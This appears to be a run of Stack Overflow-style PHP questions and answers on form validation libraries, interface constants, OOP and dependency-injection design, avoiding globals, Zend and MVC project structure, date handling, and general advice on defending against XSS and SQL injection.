Original Question

Is there a well tested and preferably mature library out there for creating forms in PHP with both client side (this is where the jQuery comes in) and server side validation?

Ideally the form would either be generated from PHP classes or written as plain HTML and parsed ala Agavi. The correct jQuery hooks would then automatically be created by the library so that the included jQuery client side validation can run.

One of the jobs I do regularly is some variation on the good old contact form and I would like to standardise this work so that I can trot out the same best practice code each time. With this in mind the HTML generated by the PHP classes should be good enough so that extra CSS hooks can be added where needed etc.

Any suggestions gratefully received.

Update

I have been combing through and reviewing the options that I have found and that others have suggested below and at the moment I would rank the projects in the following order for quality from the small amount of testing and research I have done on all of them.

1. ValidForm Builder
2. jFormer
3. HTML_QuickForm2 (if you can get the client side validation working then this should jump higher than jFormer!)
4. php-form-builder-class
5. Use Symfony! (a whole MVC framework for form rendering and validation is overkill)

I am still unconvinced by any of the options to be honest and I am left wondering why people who embark on these projects do not start with some solid and well tested components. For example I would have thought a combination of:

• jQuery Tools (client side validation, datepickers, etc)
• Symfony form component perhaps
• Perhaps with Respect Validation

Would give you a good stable base to work from and produce a nice library on top of tested components.

Also if you are interested in a library that parses your HTML rather than generating the HTML from a PHP class I have found a project called Minacl. Like the Agavi option I mentioned in the original question.

You can use ValidForm Builder. It matches perfect to your requirements: With it you can define Forms with validation rules in PHP, and it generates the Forms with jQuery and client side validation.

Feature List (taken from their site):

• the API generates XHTML Strict 1.0 compliant code.
• Field validation on the client side to minimize traffic overhead.
• Field validation on the server side to enforce validation rules and prevent tempering with the form through SQL injection.
• Client side validation displays inline to improve user satisfaction. No more annoying popups that don't really tell you anything.
• Easy creation of complex form structures.
• Uses the popular jQuery Javascript library for DOM manipulation.
• Completely customizable using CSS.
• Automatic creation of field summaries for form mailers in both HTML and plain text.
• it's open source and therefore completely free!

PHP interfaces allow the definition of constants in an interface, e.g.

interface FooBar
{
    const FOO = 1;
    const BAR = 2;
}
echo FooBar::FOO; // 1

Any implementing class will automatically have these constants available, e.g.

class MyFooBar implement FooBar
{
}
echo MyFooBar::FOO; // 1

My own take on this is that anything Global is Evil. But I wonder if the same applies to Interface Constants. Given that Coding against an Interface is considered good practise in general, is using Interface Constants the only constants that are acceptable to use outside a class context?

While I am curious to hear your personal opinion and whether you use Interface constants or not, I'm mainly looking for objective reasons in your answers. I dont want this to be a Poll Type question. I'm interested in what effect using interface constants has on Maintainability. Coupling. Or Unit Testing. How does it relate to SOLID PHP? Does it violate any coding principles that are considered Good Practise in PHP? You get the idea …

Note: there is a similar question for Java that already lists quite good reasons why they are Bad Practise, but since Java isn't PHP, I felt it justified to ask it within the PHP tag again.

Well, I think that it boils down to the difference between good and good enough.

While in most cases you can avoid the use of constants by implementing other patterns (strategy or perhaps flyweight), there is something to be said for not needing a half dozen other classes to represent a concept. I think what it boils down to, is how likely is there a need for other constants. In other words, is there a need to extend the ENUM provided by the constants on the interface. If you can foresee needing to expand it, then go with a more formal pattern. If not, then it may suffice (it'll be good enough, and hence be less code to write and test). Here's an example of a good enough and a bad use:

Bad:

interface User {
    const TYPE_ADMINISTRATOR = 1;
    const TYPE_USER          = 2;
    const TYPE_GUEST         = 3;
}

Good Enough:

interface HTTPRequest_1_1 {
    const TYPE_CONNECT = 'connect';
    const TYPE_DELETE  = 'delete';
    const TYPE_GET     = 'get';
    const TYPE_HEAD    = 'head';
    const TYPE_OPTIONS = 'options';
    const TYPE_POST    = 'post';
    const TYPE_PUT     = 'put';

    public function getType();
}

Now, the reason that I chose those examples is simple. The User interface is defining an enum of user types. This is very likely to expand over time and would be better suited by another pattern. But the HTTPRequest_1_1 is a decent use-case, since the enum is defined by RFC2616 and will not change for the lifetime of the class.

In general, I don't see the problem with constants and class constants as being a global problem. I see it as a dependency problem. It's a narrow distinction, but a definite one. I see global problems as in global variables which are not enforced, and as such create a soft global dependency. But a hard-coded class creates an enforced dependency, and as such create a hard global dependency. So both are dependencies. But I consider the global to be far worse since it's not enforced... Which is why I don't like to lump class dependencies with global dependencies under the same banner...

If you write MyClass::FOO, you're hard-coded to the implementation details of MyClass. This creates a hard-coupling, which makes your code less flexible, and as such should be avoided. However, interfaces exist to permit exactly this type of coupling. Therefore MyInterface::FOO doesn't introduce any concrete coupling. With that said, I wouldn't introduce an interface just to add a constant to it.

So if you're using interfaces, and you're very sure that you (or anyone else for that matter) won't need additional values, then I don't really see a huge issue with the interface constants... The best designs wouldn't include any constants or conditionals or magic-numbers or magic-strings or hard-coded anything. However, that adds additional time to the development, as you must consider the uses. My view is that most times it's absolutely worth taking the additional time to build a great solid design. But there are times when good enough really is acceptable (and it takes an experienced developer to understand the difference), and in those cases it's fine.

Again, that's just my view on it...

I am soon to join a PHP project that has been developed over the course of several years. It's going to be huge, sparsely documented, many files, piles of code, no consitent quality level is to be expected.

How would you go about gathering as much information as possible about what is going on?

• Autoloading is not be expected, at least not extensively, so inclued might do a good job revealing the interdependencies.

• Having phpDocumentor digest the project files might give an idea about which classes/methods/functions are present.

• Maybe phpCallGraph for method/function relations.

• Profiling some generic use cases with XDebug to gain an idea about the hierarchies and concepts.

• Inspecting important log-files ... checking out warnings, deprecated usages, errors.

• phpinfo().

• Maybe extracting all comments and process them into a html-file.

Didn't cover Unit-Tests, Databases, ....

What would you do? What are your experiences with mentioned tools to get the most out of them?

You can assume any condition necessary.

What statistical information could be useful to extract?

Has somebody experience with those tools?

EDIT from "PHP Tools for quality check":

• PHP Mess Detector
• Copy/Paste Detector (CPD) for PHP code by Seb. Bermann

EDIT 2 from Bryan Waters' answer:

• phploc - phploc is a tool for quickly measuring the size of a PHP project.

• Inspecting Apache logs and Google Analytics data to find out about the top requested URLs and then analyze what happens using XDebug profiling and a tool like KCachegrind.

• See his answer for concrete techniques.

Setting up a deployment / build / CI cycle for PHP projects - suggested by Pekka

EDIT 3

Just found this PDF of a talk by Gabriele Santini - "Statistical analysis of the code - Listen to your PHP code". This is like a gold mine.

I agreee that your question does have most of the answers.

This is what I would probably do. I would probably start with Sebastian Bergman's tools, especially phploc so you can get an idea of the scope of the mess (codebase) you are looking at. It gives you class, function counts, etc not just lines of code.

Next I would look in the apache logs or google analytics and get the top 10 most requested php url's. I'd setup XDebug with profiling and run through those top 10 requests and get the files, call tree. (You can view these with a cachegrinder tool)

Finally, I'd read through the entire execution path of 1 or two of those traces, that is most representative of the whole. I'd use my Eclipse IDE but print them out and go to town with a highlighter is valid as well.

The top 10 method might fail you if there are multiple systems cobbled together. You should see quickly with Xdebug whether the top 10 are coded similarliy are if each is a unique island.

I would look at the mysql databases and try to understand what they are all for, espacially looking at table prefixes, you may have a couple of different apps stacked on top of each other. If there are large parts of the db not touched by the top 10 you need to go hunting for the subapps. If you find other sub apps run them through the xdebug profiler and then read through one of the paths that is representative of that sub app.

Now go back and look at your scope numbers from phploc and see what percentage of the codebase (probably count classes, or functions) was untouched during your review.

You should have a basic understanding of the most often run code and and idea of how many nooks and crannies and closets for skeleton storage there are.

Since Symfony 1.x's admin generator, I found this kind of tool really useful to prototype applications, show something very quickly to customers etc.

Now for Symfony2, admin generator does not seems to be a priority (see here and here)

Django's admin generator seems very interesting...

Which web application admin generator (any language / technology) would you recommend (pros / cons) ?

Thanks.

Django's automatic admin app is excellent. Once you've written your models, it automatically creates a full-featured admin app around them where you can create, update and delete records. It's also extensible and customizable for just about whatever you need.

Here's a pretty good overview about it. Django (and python) is intuitive and satisfying to work with -- I highly recommend that you set it up and play with it and see how well it works.

Could this be classified as correct OOP programing?

class Greeting {

    public $greet = array('Hi','Hello', 'Howzit', 'Ola', 'Whats up');

    function __construct($name) {
        $this->name = $name;
        shuffle($this->greet);
    }
}

$hi = new greeting('INSERTNAMEHERE'); /*NAME OF PERSON GOES HERE*/
echo $hi->greet[1] .' '. $hi->name;

For the sake of Keeping it Simple, I'd say it's okay. It's not too proper OOP though, nor is it particularly easy to understand code. Having working code is better than having no code at all though.

Let's go through your code:

1 class Greeting {
2
3    public $greet = array('Hi','Hello', 'Howzit', 'Ola', 'Whats up');
4
5    function __construct($name) {
6        $this->name = $name;
7        shuffle($this->greet);
8    }
9 }

Line 1: says this class represents the concept of a Greeting. What is a Greeting? I'd say something like "Hello John" or "Hi John" or "Howdy John" is a greeting. And in fact, you seem to agree because in …

Line 3: … you do have a list of similar greetings, just without a name. But that property warrants the question why your class is named Greeting, when it really encapsulates multiple greetings already. Shouldn't the class be called Greetings (mind the plural) then?

Line 3: Naming the property "greet" wasn't a too good idea either. It's a property, so dont give it the name of a verb. Verbs are for methods.

Line 3: Although there is people who will tell you different, making the property public is rarely a good idea. Properties are about internal state and that state should not be accessible directly, but only through methods.

Line 5: Your constructor then tells me a Greeting has to have a name. If I wouldn't be looking at the source code already, I'd falsely assume this to be the name of the Greeting. But you really mean a Person's name. The argument should reflect that and be named something more indicative, like $greetedPersonsName.

Line 6: Assigning properties on the fly is a boo boo. If I look at the class definition, I want to see the properties immediately. Discovering them inside some method makes the code hard to understand. This will also not getting picked up when generating API docs. Avoid it.

Line 7: The shuffle is another unexpected thing. It's a non-obvious side-effect. If I was to instantiate a new Greeting, I'd expect the greetings to appear in the order they are listed. It's against the Principle of Least Astonishement to shuffle them in the ctor. The shuffling should happen from a public method that does nothing but shuffling, e.g.

public function shuffleGreetings()
{
    shuffle($this->greetings);
}

Assuming the idea of the class was really to be a single Greeting that just initializes itself with one of the default possible values, we can also add a Getter like this:

public function getGreeting()
{
    return $this->_greetings[0] . ' ' . $this->name;
}

This is better than doing

echo $hi->greet[1] .' '. $hi->name;

because it hides the implementation details. I don't need to know that the Greeting object has an array of possible greetings. I just want to get the Greeting combined with the set name. It's still far from perfect though, because you still would use it like

$hi = new Greeting('John'); // A Greeting named John? Why $hi then?
$hi->shuffleGreetings();    // Shuffling Greetings in a Greeting?
echo $hi->getGreeting();    // Why is it "Hello John" all of a sudden?

As you can see, the API is still pretty much full of WTF. A developer will still have to look at your source code to understand what's going on.

More on Side-Effects

While it may be tempting to put the shuffle into getGreeting you should not do so. A method should return the same thing for the same input. When I call getGreeting twice in a row, I can expect it to return the same result. You would expect 1+1 to return 2 always, so make sure your methods do too.

Likewise, if you want to have a single method to return a random item from the greetings property, dont shuffle the greetings array. If you would use the shuffle method instead, you would also change the greetings property. That ripples to any function reading from the property, e.g. when you do

public function getRandomGreeting()
{
    $this->shuffleGreetings();
    return $this->getGreeting();
}

a developer will experience something like this:

$hi = new Greeting('John');
$hi->shuffleGreetings();
echo $hi->getGreeting();       // for example "Hello John"
echo $hi->getRandomGreeting(); // for example "Hi John"
echo $hi->getGreeting();       // for example "Howdy John" <-- WTF!!

Use an implementation that doesnt change the property, e.g.

public function getRandomGreeting()
{
    $randomKey = array_rand($this->greetings);
    return $this->greetings[$randomKey] . ' ' . $this->name;
}

That is free of side-effects:

$hi = new Greeting('John');
$hi->shuffleGreetings();
echo $hi->getGreeting();       // for example "Hello John"
echo $hi->getRandomGreeting(); // for example "Hi John"   
echo $hi->getGreeting();       // still "Hello John". Expected!

The API is still far from pretty though. If I think about the properties of a Greeting, I just dont think "Person's name". Just saying "Hi" oder "Hello" is still a valid greeting. It doesn't require a name. How about

public function greetPerson($personName)
{
    return $this->getGreeting() . ' ' . $personName;
}

and then we can do

$hi = new Greeting;
$hi->shuffleGreetings();
echo $hi->greetPerson('John');

And to finally hide that our Greeting contains an array that needs to be shuffled, let's move our shuffleGreetings method back to the ctor and rename the class to RandomGreeting.

class RandomGreeting …

    public function __construct()
    {
        $this->shuffleGreetings();
    }

This might seem counterintuitive at first, because I told you not to shuffle in the ctor. But with the class renamed to RandomGreeting, it is much more to be expected that there is something happening behind the scenes. We just don't need to know what exactly. To reflect that, we should also make the shuffleGreetings method protected now. We just hide it from the public interface completely. Now our code reads like this:

$hi = new RandomGreeting;
echo $hi->greetPerson('John'); // ex "Howdy John"

This doesn't give you any WTFs because your code clearly communicates you'll get a random greeting. The classname clearly communicates what it does.

This is a little bet better now and we could end here, but one could still argue that a Greeting should not be able to greet on it's own, but is rather something that is done by a Person instead.

Improving it

Our findings should lead us to the conclusion that a Greeting should rather be a dumb Type encapsulating the Greeting message and nothing else. All it should do is return that message. The proper way to do that in OOP would be to define an interface

interface Greeting
{
    public function getGreeting();
}

that defines a class that wants to behave like a Greeting has to have a getGreeting method. Since interfaces dont implement any logic, we also add an abstract type that contains the greeting property and the logic to return it:

abstract class GreetingType implements Greeting
{
    protected $greeting;
    public function getGreeting()
    {
        return $this->greeting;
    }
}

When there is an abstract class, there also needs to be concrete classes derived from the abstract class. So let's use Inheritance to define our concrete Greeting types:

class HiGreeting extends GreetingType
{
    protected $greeting = 'Hi';
}

class HelloGreeting extends GreetingType
{
    protected $greeting = 'Hello';
}

class HowdyGreeting extends GreetingType
{
    protected $greeting = 'Howdy';
}

It's not absolutely necessary to have an Interface and an Abstract implementing the interface. We could have made our concrete Greetings not extend from the GreetingType. But if we had just reimplemented the getGreeting method on all the various Greeting classes, we would be duplicating code and were much more prone to introducing errors and should we ever need to change something, we'd have to touch all these classes. With the GreetingType it's all centralized.

The other way round is true as well. You dont necessarily need an interface. We could have used just the abstract type. But then we would be limited to the GreetingType whereas with an interface, we could potentially add new Types with much more ease. I admit I can't think of any right now, so it is probably YAGNI. But it's so little to add that we can just as well keep it now.

We will also add a Null Object that returns an empty string. More on that later.

class NullGreeting extends GreetingType
{
    protected $greeting = '';
}

Object creation

Because I do not want to litter new classname all over my consuming classes and introduce coupling, I will a use simple Factory instead to capsule object creation:

class GreetingFactory
{
    public function createGreeting($typeName = NULL)
    {
        switch(strtolower($typeName)) {
            case 'hi':    return new HiGreeting;
            case 'howdy': return new HowdyGreeting;
            case 'hello': return new HelloGreeting;
            default:      return new NullGreeting;
        }
    }
}

The Factory is one of the few pieces of code where you actually can use a swich/case without having to check if you can Replace Conditional with Polymorphism.

Responsibility

With object creation out of the way, we can finally start to add our Greetings class:

class Greetings
{
    protected $greetings;
    protected $nullGreeting;
    public function __construct(NullGreeting $nullGreeting)
    {
        $this->greetings = new ArrayObject;
        $this->nullGreeting = $nullGreeting;
    }
    public function addGreeting(Greeting $greetingToAdd)
    {
        $this->greetings->append($greetingToAdd);
    }
    public function getRandomGreeting()
    {
        if ($this->hasGreetings()) {
            return $this->_getRandomGreeting();
        } else {
            return $this->nullGreeting;
        }
    }
    public function hasGreetings()
    {
        return count($this->greetings);
    }
    protected function _getRandomGreeting()
    {
        return $this->greetings->offsetGet(
            rand(0, $this->greetings->count() - 1)
        );
    }
}

As you can see, Greetings is really just a wrapper for an ArrayObject. It makes sure that we cannot add anything else but objects implementing the Greeting interface to the collection. And it also allows us to pick a random Greeting from the collection. It also makes sure that you always get a Greeting from the call to getRandomGreeting by returning the NullGreeting. This is awesome, because without that you would have to do

$greeting = $greetings->getRandomGreeting();
if(NULL !== $greeting) {
    echo $greeting->getMessage();
}

in order to avoid a "Fatal Error: Trying to call method on non-object" when the getRandomGreeting method did not return a Greeting object (when there is no Greeting in the Greetings class yet).

The class has no other responsibility than that. If you are unsure if your class is doing too much or has methods that should better be on some other object, look at the methods in that class. Do they work with a property of that class? If not, you should probably move that method.

Getting it done

Now to finally put all that code to use, we add our Person class now. Since we want to make sure we can call a getName method on it, we create an interface before doing so

interface Named
{
    public function getName();
}

We could have named that interface IPerson or whatever but it only has one method getName and the most fitting name is Named then, because any class implementing that interface is a named thing, including, but not limited to our Person class:

class Person implements Named
{
    protected $name;
    protected $greeting;
    public function __construct($name, Greeting $greeting)
    {
        $this->name = $name;
        $this->greeting = $greeting;
    }
    public function getName()
    {
        return $this->name;
    }
    public function greet(Named $greetable)
    {
        return trim(sprintf(
            '%s %s',
            $this->greeting->getGreeting(),
            $greetable->getName()
        ));
    }
}

Our Person has a required name and we demand it to have a Greeting as well. All it can do besides returning it's name is greet another Named thing, likely another person. And that's it.

To put that all together now:

$greetings->addGreeting($greetingsFactory->createGreeting('Hi'));
$greetings->addGreeting($greetingsFactory->createGreeting('Howdy'));
$greetings->addGreeting($greetingsFactory->createGreeting('Hello'));
$john = new Person('John Doe', $greetings->getRandomGreeting());
$jane = new Person('Jane Doe', $greetings->getRandomGreeting());

echo $john->greet($jane), 
     PHP_EOL, 
     $jane->greet($john);

Live Demo on Pastebin

Granted that's quite a lot of code for a very simple thing to do. Some will call it overengineered. But you asked for correct OOP and while I am sure there is still room for improvement, it's quite proper and SOLID in my book. And it's easy to maintain now, because the responsibilities are closer to where they should be.

I'm building out a small project to try to teach myself as much of the fundamentals as possible, which for me means not using a prefabricated framework (As Jeff once put it, "Don't reinvent the wheel, unless you plan on learning more about wheels" [emphasis mine]) and following the principles of Test Driven Development.

In my quest, I recently ran into the concept of Dependency Injection, which appears essential to TDD. My problem is that I can't quite wrap my head around it. My understanding so far is that it more or less amounts to "have the caller pass the class/method any other classes it may need, rather than letting them create them themselves."

I have two example issues that I'm trying to resolve with DI. Am I on the right track with these refactorings?

Database Connection

I'm planning to just use a singleton to handle the database, as I'm currently not expecting to use multiple databases. Initially, my models were going to look something like this:

class Post {  
  private $id;  
  private $body;  

  public static function getPostById($id) {  
    $db = Database::getDB();  
    $db->query("SELECT...");  
    //etc.  
    return new Post($id, $body);
  }  

  public function edit($newBody) {  
    $db = Database::getDB();  
    $db->query("UPDATE...");  
    //etc.  
  }  
}  

With DI, I think it would look more like this:

class Post {  
  private $db; // new member

  private $id;  
  private $body;  

  public static function getPostById($id, $db) { // new parameter   
    $db->query("SELECT...");  // uses parameter
    //etc.  
    return new Post($db, $id, $body);
  }  

  public function edit($id, $newBody) {   
    $this->db->query("UPDATE...");  // uses member
    //etc.  
  }  
} 

I can still use the singleton, with credentials specified in the application setup, but I just have to pass it from the controller (controllers being un-unit-testable anyway):

Post::getPostById(123, Database::getDB);

Models calling models

Take, for example, a post which has a view count. Since the logic to determine if a view is new isn't specific to the Post object, it was just going to be a static method on its own object. The Post object would then call it:

class Post {
  //...

  public function addView() {
    if (PageView::registerView("post", $this->id) {
     $db = Database::getDB();
     $db->query("UPDATE..");
     $this->viewCount++;
   }
}

With DI, I think it looks more like this:

class Post {
  private $db;
  //...

  public function addView($viewRegistry) {
    if ($viewRegistry->registerView("post", $this->id, $this->db) {
     $this->db->query("UPDATE..");
     $this->viewCount++;
   }
}

This changes the call from the controller to this:

$post->addView(new PageView());

Which means instantiating a new instance of a class that only has static methods, which smells bad to me (and I think is impossible in some languages, but doable here because PHP doesn't allow classes themselves to be static).

In this case we're only going one level deep, so having the controller instantiate everything seems workable (although the PageView class is getting its DB connection indirectly by way of the Post's member variable), but it seems like it could get unwieldy if you had to call a method that needed a class that needed the class that needed a class. I suppose that could just mean that's a code smell too though.

Am I on the right track with this, or have I completely misunderstood DI? Any criticisms and suggestions are greatly appreciated.

Yes. It looks like you have the right idea. You'll see that as you implement DI all your dependencies will float to the "top". Having everything at the top will make it easy to mock the necessary objects for testing.

Having a class that needs a class that needs a class is not a bad thing. What your describing there is your object graph. This is normal for DI. Lets take a House object as an example. It has a dependency on a Kitchen; the Kitchen has a dependency on a Sink; the Sink has a dependency on a Faucet and so on. The House's instantiation would look something like new House(new Kitchen(new Sink(new Faucet()))). This helps to enforce the Single Responsibility Principle. (As an aside you should do this instantiation work in something like a factory or builder to further enforce the Single Responsibility Principle.)

Misko Hevery has written extensively about DI. His blog is a great resource. He's also pointed out some of the common flaws (constructor does real work, digging into collaborators, brittle global state and singletons, and class does too much) with warning signs to spot them and ways to fix them. It's worth checking out sometime.

I ask myself on the utility of the global keyword:

Is there any reasons to prefer one method to another ?

• Security?
• Perfs?
• anything else?

method 1:

function exempleConcat($str1, $str2)
{
  return $str1.$str2;
}

method 2:

function exempleConcat()
{
  global $str1, $str2;
  return $str1.$str2;
}

In what case can I make sense in the use of this keyword?

For me, it just appear to be dangerous... But it may just be a leak of knowledge, so, i'm interrested for documented (e.g. with exemple of code, link to documentation...) technical option.

Thanks in advance!

Bounty

This is is a nice general question about the topic, I (@Gordon) am offering a Bounty to get some more additional answers. Whether your answer is in accordance with my own answer or a different view doesn't matter. Since the Global topic comes up every now and then, we could use a good "canonical" answer to link against.

Globals are evil

This is true for the global keyword as well as everything else that reaches from a local scope to the global scope (statics, singletons, registries, constants). You do not want to use them. A function call should not have to rely on anything outside, e.g.

function fn()
{
    global $foo;              // never ever use that
    $a = SOME_CONSTANT        // do not use that
    $b = Foo::SOME_CONSTANT;  // do not use that unless self::
    $c = $GLOBALS['foo'];     // incl. any other superglobal ($_GET, …)
    $d = Foo::bar();          // any static call, incl. Singletons and Registries
}

All of these will make your code depend on the outside. Which means, you have to know the full global state your application is in before you can reliably call any of these. The function cannot exist without that environment.

In addition, in case of hardcoded classnames, your function also cannot exist without that class being available. Reuse is severly hampered by that. So is unit-testing.

Also, your function signatures are lying when you couple to the global scope

function fn()

is a liar, because it claims I can call that function without passing anything to it. It is only when I look at the function body that I learn I have to set the environment into a certain state.

If your function requires arguments to run, make them explicit and pass them in:

function fn($arg1, $arg2)
{
    // do sth with $arguments
}

clearly conveys from the signature what it requires to be called. It is not dependent on the environment to be in a specific state. You dont have to do

$arg1 = 'foo';
$arg2 = 'bar';
fn();

Even worse, when you are changing globals inside your function, your code will quickly be completely incomprehensible, because your functions are having sideeffects all over the place.

In lack of a better example, consider

function fn()
{
    global $foo;
    echo $foo;     // side effect: echo'ing
    $foo = 'bar';  // side effect: changing
}

And then you do

$foo = 'foo';
fn(); // prints foo
fn(); // prints bar <-- WTF!!

There is no way to see that $foo got changed from these three lines. Why would calling the same function with the same arguments all of a sudden change it's output or change a value in the global state? A function should do X for a defined input Y. Always.

This gets even more severe when using OOP, because OOP is about encapsulation and by reaching out to the global scope, you are breaking encapsulation. All these Singletons and Registries you see in frameworks are code smells that should be removed in favor of Dependency Injection. Decouple your code.

More Resources:

• How is testing Registry Pattern or Singleton hard in PHP?
• http://misko.hevery.com/code-reviewers-guide/flaw-brittle-global-state-singletons/
• http://kore-nordmann.de/blog/0103_static_considered_harmful.html
• http://gooh.posterous.com/singletons-in-php
• https://secure.wikimedia.org/wikipedia/en/wiki/Solid_(object-oriented_design)

Hi, iam using zend framework to build a REST web service and i am using modules to separate my api versions.

Now, i want to have a separate configuration file for each of my module (v1 and v2), mainly for specifying separate database connections.

I had a directory structure like this:

- application
      - modules
            - v1
                  - controllers
                  - models
                  - views
                  - configs
                    - module.ini         
            - v2
                  - controllers
                  - models
                  - views  
                  - configs
                    - module.ini
      - configs
            - application.xml   
- library

I already have the database connection mentioned in my "application.ini" inside application/configs. I read here about module specific confurations and tried it.

I removed these database params from application.ini and put it in module.ini:

[production]
resources.db.adapter = PDO_MYSQL
resources.db.params.host = 127.0.0.1
resources.db.params.username = myuser   
resources.db.params.password = mypwd
resources.db.params.dbname = my_db
resources.db.params.profiler.enabled = "true"
resources.db.params.profiler.class = "Zend_Db_Profiler_Firebug"

.....

But i got an error saying "No adapter found..." when i accessed database in my module's controller. Please help...

The solution (My_App) you refer to in your question does not require any additional configuration for module specific database connections, or any other module specific configuration (except for routes). All you need to do is to declare a MultiDb resource in the application.ini as db1. Then you can declare any module specific database resource in the requested module's respective module.ini as db2, db3, db4... etc... you do not need any additional configuration. I placed an example in the download file at my github. Not to disrespect the response by "mingos" above but there's no need for any additional code in My_App.

Here's the exact verbage taken from the download (application.ini):

...if this resource is declared here, then it
will be available to all modules. If different
db resources need to be used for different
modules then MultiDB resource can be
initiated. Example: A general db resource can be
defined here and a module specific db can be
declared in its corresponding module.ini.
The db resource declared in the module will not
be available to other modules but the db resource
in this application.ini will be available to all
modules...

Then it declares a single db resource as an example in the download. Just change it to a multi db resource. Declare the application wide needed db resource in application.ini, and any additional db resource that is needed for any specific module in their respective module.ini files. It's straightforward. That's all you need to do. Once you understand the logic behind My_App, you will see it's very powerful.

I've decided to completely rewrite my old PHP project from the ground up. Before, I had one file for each page and now I'd like to use MVC pattern approach with one point of entry instead. The project itself is quite big and I'm trying to build my own framework so I can integrate everything nicely.

I've searched stackoverflow for similar questions and I've found some but they had quite different folder structures so I decided to post my own.

Folder structure so far

/applications
    /administration
        /private
            /controllers
            /models
            /views
            configuration.php
        /public
            /ajax
            /fonts
            /icons
            /images
            /stylesheets
        index.php
    /website
        /private
            /controllers
            /models
            /views
            configuration.php
        /public
            /ajax
            /fonts
            /icons
            /images
            /stylesheets
        index.php
/backups
/library
    /helpers
        datetime.php
        text.php
    controller.php
    model.php

Details

• /applications - I've separated administration from the normal website and I'll also use different sub-domain for the administration.
• /applications/app/private - Access to this folder is blocked by nginx.
• /applications/app/public - As the name suggests, everything that's visible on the web.
• /applications/app/index.php - Entry point for each website.
• /backups - Database backups.
• /library - Base controllers / models reside here.
• /library/helpers - All helper classes that will be used in both websites are here so I don't need to copy/paste them into both applications.

Main questions

Is this a good way to structure my website or would you do things differently? Are there any pitfalls I might encounter with this structure? Is there anything I'm missing?

All help is very appreciated!

I'm using a similar structure (with homemade framework too but backup out of webroot). You could maybe add a "form" folder in the private folder.

I use this to make controller more readable. The forms are generaly a big wall of object code. Putting them in an external file included in the controller is a good idea.

Don't forget to exclude the public folder from the rewriting rules and everything should be allright :)

An other solution is to put index.php in your public folder and define this folder as your webroot in nginx. It prevent remote access to all other file (like backup file) which should used only by the framework.

/applications
    /administration
        /private
            /controllers
            /models
            /views
            configuration.php
        /public <---- Vhost WebRoot
            /ajax
            /fonts
            /icons
            /images
            /stylesheets
            index.php
    /website
        /private
            /controllers
            /models
            /views
            configuration.php
        /public <---- Vhost WebRoot
            /ajax
            /fonts
            /icons
            /images
            /stylesheets
            index.php
/backups
/library
    /helpers
        datetime.php
        text.php
    controller.php
    model.php

It seems like a lot of people struggle with date/time issues in PHP, and inevitably, many of the accepted answers tend to be "Use strtotime in this way."

Is this really the best way to direct people dealing with date problems? I'm beginning to feel like strtotime is sort of a nifty trick that shouldn't necessarily be relied on for important date/time calculations, and by the nature of it taking arbitrary strings, it seems like a potential source of buggy, hard-to-predict behavior. It's inability to differentiate between MM/DD/YYYY and DD/MM/YYYY is sort of a big deal, no?

StackOverflow is usually very good at promoting good practices (I rarely see a mysql_real_escape_string conversion that doesn't have someone say "Use PDO instead.")

But there doesn't seem to be an accepted norm around date issues in PHP, with a lot of people falling back on the crutch that is strtotime.

So, what should we be doing about this, if anything at all? Is there a better norm we should be enforcing for people asking questions like "How do I add 1 week to X", or "How do I convert this date format to this other date format?"

Really, what is the best, most reliable way to deal with Date/Time issues like strtotime tries to, but too often fails to.

I'll start off by saying that I am a big advocate for using the DateTime object, which allows you to use the DateTime::createFromFormat() function. The DateTime object makes the code much more readable and avoids the need to do the whole Unix timestamp modification using 60 * 60 * 24 to advance the date days.

That being said, the arbitrary string that strtotime() takes is not very hard to predict. Supported Date and Time Formats lists the formats that are supported.

As per your example of not being able to differentiate between MM/DD/YYYY and DD/MM/YYYY it does differentiate based on the Date Formats. Dates that use slashes are always read as American format. So a date in the format 00/00/0000 will always be read as MM/DD/YYYY. Alternatively using dashes or periods will be DMY. e.g. 00-00-0000 will always be read as DD-MM-YYYY.

Here are some examples:

<?php
$dates = array(
    // MM DD YYYY
    '11/12/2013' => strtotime('2013-11-12'),
    // Using 0 goes to the previous month
    '0/12/2013' => strtotime('2012-12-12'), 
    // 31st of November (30 days) goes to 1st December
    '11/31/2013' => strtotime('2013-12-01'), 
    // There isn't a 25th month... expect false
    '25/12/2013' => false,

    // DD MM YYYY
    '11-12-2013' => strtotime('2013-12-11'),
    '11.12.2013' => strtotime('2013-12-11'),
    '31.12.2013' => strtotime('2013-12-31'),
    // There isn't a 25th month expect false
    '12.25.2013' => false,
);

foreach($dates as $date => $expected) {
    assert(strtotime($date) == $expected);
}

As you can see a couple of key examples are 25/12/2013 and 12.25.2013 which would both be valid if read the with the opposite format, however they return false as they are invalid according the the Suported Date and Time Formats...

So as you can see the behaviour is quite predictable. As always if you are receiving a date from use input you should be validating that input first. No method will work if you are not validating the input first.

If you want to be very specific about the date being read, or the format you are being given isn't a supported format, then I recommend using DateTime::createFromFormat().

Hi,

How should be test with phpunit php web application for xss + sql injection? I thinking to find program that output xss+ other attacks to test my application forms. This program/service should be all time updated with new xss and other new attacks. Does such service/program exist, if not how it done today? Please give some examples if you can.

(I use php 5.3 + zend framework + mysql)

Edit:

I asking about testing!and not prevent techniques that I also know.

Thanks,

Yosef

I don't think you can easily do unit tests for this kind of thing. It would require that your application is written in a way conducive to mocking its component parts and definitely involve a great deal of continuous manual work (making sure there's tests and mocks for everything, testing for the myriad flavors of attacks, etc etc).

The only certain thing is that if you can get some automated tool of broad scope that's always up-to-date, whoever gave it to you didn't charge enough.

The forms of protecting against such attacks are pretty well known and easy to utilize:

• Always escape variables in sql, or better yet use prepared statements
• If you do not need to accept and preserve HTML input, always htmlspecialchars any variable that goes into HTML (note that there are many formats such as BBCode, MarkDown, Textile etc whose sole purpose is to allow a useful subset of formatting options without opening Pandora's box)
• If you absolutely, most certainly need to accept, store and serve HTML data then there's HTMLPurifier that can help -- but do that only as a last resort

Therefore, I 'd say that it's much better value for your time to make sure that you follow these practices/use these tools.

Furthermore, if you funnel all access to these two subsystems (sql and HTML output) through a well-defined part of your application (database access methods that escape all input no matter what; HTML output functions that in the same manner escape input variables and inject them into a provided "HTML template" that you subsequently echo) then it becomes easy to unit test these subsystems. Decent PHP frameworks already do this.

At this point, the only real chance of introducing a vulnerability is by circumverting or misusing these subsystems. In my opinion you are better off spending effort on specifying and following good coding practices that writing unit tests to prevent vulnerabilities in your business logic (unit tests for you sanitization code are of course another thing entirely).

Finally, there are automated SQL injection tools and XSS-related tools that you can use to probe web applications. But unless someone hires you to do penetration testing, it's better to use these as you would use protection in sex: use it, but don't count on it.

